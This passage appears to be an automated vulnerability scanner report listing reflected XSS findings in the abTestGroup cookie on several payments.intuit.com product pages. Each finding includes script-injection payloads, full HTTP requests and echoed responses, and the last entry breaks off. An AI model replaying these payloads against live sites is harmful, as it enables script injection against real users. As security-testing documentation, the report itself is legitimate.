Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116193


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16bd521"><script>alert(1)</script>a06b40a6939" type="hidden" />
...[SNIP]...

1.111. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8b6"><script>alert(1)</script>db141cf2372 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16be8b6"><script>alert(1)</script>db141cf2372;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RUmeJMQW2zeQXOeH5zndeA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:05 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EAE770A0805192AA117E34C30FA1D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150366


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16be8b6"><script>alert(1)</script>db141cf2372" type="hidden" />
...[SNIP]...

1.112. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ccada<script>alert(1)</script>03b0d3d035e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ccada<script>alert(1)</script>03b0d3d035e;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:55 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=53Fsh9ZkrUDHbp7oUMHGEQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9605F990A0805192AA117E3E93D0972
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150350


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16ccada<script>alert(1)</script>03b0d3d035e<br />
...[SNIP]...

1.113. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cec2"><script>alert(1)</script>271f29d1570 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T162cec2"><script>alert(1)</script>271f29d1570;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:45 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=8uIscsyAcAxK6UG5XBL70g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:46 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D7A010A0805192AA117E37D24A810
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121588


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T162cec2"><script>alert(1)</script>271f29d1570" type="hidden" />
...[SNIP]...

1.114. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3073f<script>alert(1)</script>daf5c68037 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163073f<script>alert(1)</script>daf5c68037;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=vrChgoohWVM8zjK8gWTXgQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EFA180A0805192AA117E32813E0CE
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121570


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T163073f<script>alert(1)</script>daf5c68037<br />
...[SNIP]...

1.115. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload a853f<script>alert(1)</script>6d2e750d194 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a853f<script>alert(1)</script>6d2e750d194;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=dkvxEMxSJoNDWw3yYMG1Ug**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E9B810A0805192AA117E3BA39685A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127098


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16a853f<script>alert(1)</script>6d2e750d194<br />
...[SNIP]...

1.116. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda72"><script>alert(1)</script>0bd96e557df was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bda72"><script>alert(1)</script>0bd96e557df;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:18 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=glcdfXA9NtOUrBVpxZTdFA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:19 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D10D60A0805192AA117E3998AC0B7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127114


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16bda72"><script>alert(1)</script>0bd96e557df" type="hidden" />
...[SNIP]...

1.117. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 49004<script>alert(1)</script>a5a17e50b33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1649004<script>alert(1)</script>a5a17e50b33;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=60SdIUifGBPKGJj3gZgUzg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9600E320A0805192AA117E3CB159DAA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116390


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T1649004<script>alert(1)</script>a5a17e50b33<br />
...[SNIP]...

1.118. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

